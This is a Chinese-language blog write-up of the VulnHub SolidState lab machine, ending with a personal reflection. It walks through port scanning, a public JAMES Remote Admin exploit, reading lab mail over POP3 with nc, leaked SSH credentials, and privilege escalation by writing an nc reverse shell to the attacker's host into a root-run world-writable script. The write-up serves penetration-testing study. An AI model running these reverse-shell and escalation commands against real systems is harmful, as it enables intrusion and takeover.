靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp，看我一个欧洲步闪转腾挪拿到root

一、信息收集

arp-can -l
扫描同网段，这里192.168.122.195就是我们打开的靶机了

二、指纹扫描

nmap -sS -sV 192.168.122.195
nmap -p- -sV -A 192.168.122.195
whatweb -v 192.168.122.195

1、扫描一下,nmap -sS -sV 192.168.122.195

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)

25/tcp   open  smtp        JAMES smtpd 2.3.2

80/tcp   open  http        Apache httpd 2.4.25 ((Debian))

110/tcp  open  pop3        JAMES pop3d 2.3.2

119/tcp  open  nntp        JAMES nntpd (posting ok)

4555/tcp open  james-admin JAMES Remote Admin 2.3.2

2、nmap -p- -sV -A 192.168.122.195

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
25/tcp  open  smtp    JAMES smtpd 2.3.2
80/tcp  open  http    Apache httpd 2.4.25 ((Debian))
110/tcp open  pop3    JAMES pop3d 2.3.2
119/tcp open  nntp    JAMES nntpd (posting ok)

3、whatweb 192.168.122.195

三、我们先看一下80端口，dirb和dirsearch在后台扫着

这里80端口打不开，可能是网络问题也可能是无法打开

我们扫出来的网页。

四、还是看一下扫出来的页面

这里扫出来一个网页，估计能存在注入啥的，这是一个邮件系统这里貌似有一个邮箱

我们f12一下，看到后面还有几个js文件

四、找找EXP

说实话，这几个网页感觉不像是攻击点，我们换个端口，在之前扫描时候好像是有一个远程命令执行漏洞就这里，一开始是瞟了一眼，记得有这个Remote，版本应该比较老，去github或者浏览器上搜索一下Exp撞脸上了，下载试试，或者去searchspliot找一下也可以，msf不建议，考试就一次机会这里还是挺方便的，找了一下使用方法我们下载下来使用一下 这里使用了，但是我们不知道密码，只有账户，这个我们先放一边

这里很奇怪，决定换个方向 在一个文章上找了一个师傅说直接用nc就能连接这里有几个用户，先把密码改成root，然后使用nc连接一下110端口（邮箱端口）这里我是第一次使用这个nc连接110端口，命令语句是

nc -nC 192.168.122.196 110
user james
pass root
这个是我们之前找到的账号和自己设置的密码
使用retr命令下载文件
这里我也是第一次了解这个功能命令，retr和stor是ftp中下载上命令，可以针对文件和目录

这是我们得到的邮件，大概是老板让他给新员工发送个临时账户之类的信息，我们看看别人的邮箱这里mindy邮箱报了啊，账号和密码爆出来了

username: mindy
pass: P@55W0rd1!2@
这是我们找到的新员工账户和密码，猜测用于ssh登录

这里是ssh登录，可以使用我们的账户密码进行登录我们cat /etc/passwd，看到了mindy用户是不完整的shell，可以利用/bin/rbash/进行反向shell提权。这里也是用了我们一开始下载的exp，没想到是在这儿用的。

1、开python环境

python -m http.server 80
开python环境，因为我们后续要用python


2、开启监听

nc -nvlp 6666
nc真的是打靶的瑞士军刀，确实好用

3、执行exp

这里exp有两个版本，选哪个都可以，我选择的是50437的，就是不用vi进去修改，在终端就可以配置pyload

4、ssh连接

ssh [email protected]

到这里我们就已经登录了mindy的账户了

5、抽象提权

这里显示了我们的根目录在opt，我们看一下

这里是有一个所有人都能写入的文件，且是root组的文件，写了一个tmp.py的临时文件，777也就是任何人都能执行这个脚本，我们插入一个反弹shell，这里注意我们要插入shell要让root运行，而mindy账户运行时反弹mindy的shell

echo'import os; os.system("/bin/nc 192.168.122.187 666 -e /bin/bash")' > /opt/tmp.py

这波我直接上演碟中谍之谁的nc -vnlp，这里是很抽象提权

6、补充

然后我们再在kali开一个终端开一个监听，就是让mindy丢一个反弹shell到tmp.py里面，然后我们再开一个终端，这个tmp脚本会自动处理文件，然后反连我们。这波我直呼卧槽。这里猜测一个这个txt里面应该是个flag，打ctf碰到这东西可爽了

技术总结：说实话，最后提权用nc有点绕、抽象，但是相比之前打靶机确实有很大进步，得把反弹shell语法记住，这个很关键，nc也得再精进一点，这东西是真好用，砍瓜切菜很顶。

心得总结：这个靶机打的很爽，从提权第一步到执行完exp全是个人摸索，中途也很想看答案或者别的师傅，但还是硬着头皮坐了下去，没想到是成功了，现在是23：51，不然我一定大喊一声牛B。打靶越来越顺了，还行，今天和朋友去吃烤肉还聊考研和找工作这个事了，但是很多同学都想考研，想站的更高，但我却认为社会也是很好的老师，或许我这样一个另类也能创造什么样的成绩，我的学校师哥师姐也没有走红队、渗透的，一路摸索说实话，有点慌但还是有着莫名的自信觉得自己可以走这条路，也许走那条路没有对错。ok今天靶机到这里了，好好享受大学、好好享受生活、好好享受学渗透的这个过程吧，明天也要天天开心（虽然打靶有时候会很痛苦).

后续我也会出更多打靶文章，希望大家关注！谢谢。